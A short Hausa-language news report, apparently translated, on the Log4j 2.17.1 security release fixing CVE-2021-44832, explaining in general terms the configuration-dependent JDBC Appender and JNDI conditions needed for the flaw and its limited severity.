An buga gyaran gyare-gyare na ɗakin karatu na Log4j 2.17.1, 2.3.2-rc1 da 2.12.4-rc1, waɗanda ke gyara wani rauni (CVE-2021-44832). An ambaci cewa matsalar tana ba da izinin aiwatar da code na nesa (RCE), amma an yi masa alama a matsayin benign (CVSS Score 6.6) kuma galibi yana da sha'awar ka'idar kawai, tunda yana buƙatar takamaiman sharuɗɗa don amfani - dole ne maharin ya sami damar yin canje-canje zuwa fayil ɗin saituna Log4j, i.e. dole ne ya sami damar yin amfani da tsarin da aka kai hari da kuma ikon canza ƙimar ma'aunin daidaitawar log4j2.configurationFile ko yin canje-canje ga fayilolin da ke akwai tare da saitunan shiga.
Harin ya faɗo don ma'anar tsarin tushen JDBC Appender akan tsarin gida wanda ke nufin JNDI URI na waje, akan buƙatar wanda za'a iya dawo da aji na Java don aiwatarwa. Ta hanyar tsoho, ba a saita JDBC Appender don sarrafa ka'idojin da ba na Java ba, i.e. Ba tare da canza tsarin ba, harin ba zai yiwu ba. Bugu da ƙari, batun yana shafar log4j-core JAR kawai kuma baya shafar aikace-aikacen da ke amfani da log4j-api JAR ba tare da log4j-core ba. ...
source: budenet.ru